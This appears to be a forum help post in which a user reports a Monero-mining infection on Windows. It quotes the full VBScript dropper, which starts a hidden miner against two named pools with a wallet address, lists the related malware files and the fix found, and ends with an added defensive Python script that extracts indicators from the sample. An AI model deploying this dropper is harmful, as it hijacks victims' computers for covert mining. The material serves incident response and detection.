
The first error I got was a Windows Script Host error described as C:\Windows\xdgaudio.vbs.

When I located the file, its content was:

Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -p x -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x", 0
Set WShell = Nothing

After seeing this and locating the mining server on line 3, I came to know that I have been the victim of some virus, and that this is some mining virus.

Steps I have taken to resolve this:

  1. Did a deep Windows Defender scan (got nothing).
  2. Did a scan using Anti-Rootkit (got nothing).
  3. Commented out the whole VBS script xdgaudio.vbs so that it does not execute.
  4. Navigated to wmipvrse.exe, located at C:\Windows\System32\wbem, and found out that this is a Windows service. I have not deleted it, but renamed it to something else after taking ownership so that it does not start again.

After doing the above steps, the errors are gone.

I don't know for how long I have been infected with this virus, or how it got into my computer.

My question to the community is: am I now safe from this virus, what further steps should I take to remove this and other viruses like it completely, and how can I know whether there are other viruses like this?

If you need any other details, you can ask in the comments.

Thank you.

The script error that was first displayed was this:

[Screenshot of the Windows Script Host error dialog]

UPDATE:

Figured it out!! Short answer: delete the "servicecrsssr.vbs" file from your Windows directory, then reboot. (I actually PULLED THE PLUG, despite the danger of file loss/corruption, to avoid the possibility of the program attempting to rewrite any offending files during the shutdown process.)

A number of other files are involved, but upon deleting (or renaming) the file above and rebooting, all was well: no evidence of the mining process running. I caught this virus on TWO of my test computers. These were the only computers I connected my customer's infected drive to via USB. It's STILL a mystery exactly how this thing propagates! The other files which seemed to be involved were:

\Windows\winprs.bat
\Windows\winvpr.vbs
\Windows\winvprse.bat
\Windows\xdgaudio.vbs
\Windows\Prefetch\WMIPVRSE.exe-xxxxxxxx.pf

The *.pf file rewrites itself with new random characters in place of the "x"s if you rename or delete it and reboot, with no ill effect that I can determine. On my first infected machine, I renamed ALL of the files above, rebooting after renaming each one. The last file I tried was "servicecrsssr.vbs". On the second infected test machine, I only renamed the "servicecrsssr.vbs" file and rebooted, and then all was well. Please let me know how this works out for you. Thanks!

Special thanks to LREmery's answer.
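The post above shows a VBScript dropper whose only job is to launch a CPU miner with a hidden window, pointing at two stratum pools and a single Monero wallet. The following is an added triage script (not code from the post or its author) that takes the text of a suspect .vbs file, extracts every WScript.Shell Run command, and pulls out the indicators a responder would want to record: pool hosts and ports, wallet addresses, miner command-line flags and whether the window style was 0 (hidden). The sample script embedded in it is the xdgaudio.vbs content quoted in the post, and the filename list is the set of files the post reports; both are constructed inputs for an offline run, not a general signature set.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the dropper text quoted in the post (C:\Windows\xdgaudio.vbs),
# embedded here so the analysis runs offline with no file access.
SAMPLE_VBS = r'''Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -p x -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x", 0
Set WShell = Nothing
'''

# Basenames the post reports as belonging to this infection (taken from the post,
# not a general indicator list).
REPORTED_NAMES = {"servicecrsssr.vbs", "winprs.bat", "winvpr.vbs", "winvprse.bat", "xdgaudio.vbs"}

# <object>.Run "<command>"[, <windowstyle>]  -- VBScript doubles quotes inside strings.
RUN_RE = re.compile(r'\.Run\s+"((?:[^"]|"")*)"(?:\s*,\s*(\d+))?', re.IGNORECASE)
# stratum pool URLs as used by cryptonight-style miners.
POOL_RE = re.compile(r'stratum\+(?:tcp|ssl)://([\w.-]+):(\d+)', re.IGNORECASE)
# Monero primary addresses: 95 base58 characters starting with '4'.
XMR_RE = re.compile(r'\b4[1-9A-HJ-NP-Za-km-z]{94}\b')
# Command-line fragments typical of the miner family launched by this dropper.
MINER_FLAGS = ("--donate-level", "-a cryptonight", "--threads", "-o stratum", "--cpu-priority")


@dataclass
class Finding:
    commands: list = field(default_factory=list)
    hidden_window: bool = False
    pools: list = field(default_factory=list)
    wallets: list = field(default_factory=list)
    flags: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Any pool URL or wallet is enough; otherwise require a hidden-window
        # Run that also carries miner flags.
        return bool(self.pools or self.wallets) or (self.hidden_window and bool(self.flags))


def analyze_vbs(text: str) -> Finding:
    """Extract mining indicators from every WScript.Shell Run call in a VBScript file."""
    res = Finding()
    for m in RUN_RE.finditer(text):
        cmd = m.group(1).replace('""', '"')
        res.commands.append(cmd)
        # Window style 0 means "run with no window", which hides the miner from the user.
        if m.group(2) == "0":
            res.hidden_window = True
        res.pools += [f"{host}:{port}" for host, port in POOL_RE.findall(cmd)]
        res.wallets += XMR_RE.findall(cmd)
        res.flags += [flag for flag in MINER_FLAGS if flag in cmd]
    res.wallets = sorted(set(res.wallets))
    return res


def reported_names_present(listing) -> list:
    """Return directory entries whose basename matches a filename the post reports."""
    return sorted(p for p in listing if p.rsplit("\\", 1)[-1].lower() in REPORTED_NAMES)


if __name__ == "__main__":
    finding = analyze_vbs(SAMPLE_VBS)
    print("suspicious:", finding.suspicious)
    print("hidden window:", finding.hidden_window)
    print("pools:", finding.pools)
    print("wallets:", finding.wallets)
    print("miner flags:", finding.flags)
    # Constructed directory listing for the filename check.
    listing = [r"C:\Windows\servicecrsssr.vbs", r"C:\Windows\System32\notepad.exe", r"C:\Windows\winprs.bat"]
    print("reported names found:", reported_names_present(listing))
```

The pool host and wallet are the values worth keeping from an incident like this: the host lets you check proxy or DNS logs for the first time the machine reached out to the pool (which bounds how long it was infected), and the wallet is what ties a second machine to the same campaign. The filename check only covers the names the post lists; a real sweep should also look at what launches the .vbs (Run keys, scheduled tasks, startup folders), since a dropper that is not started by anything is inert.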
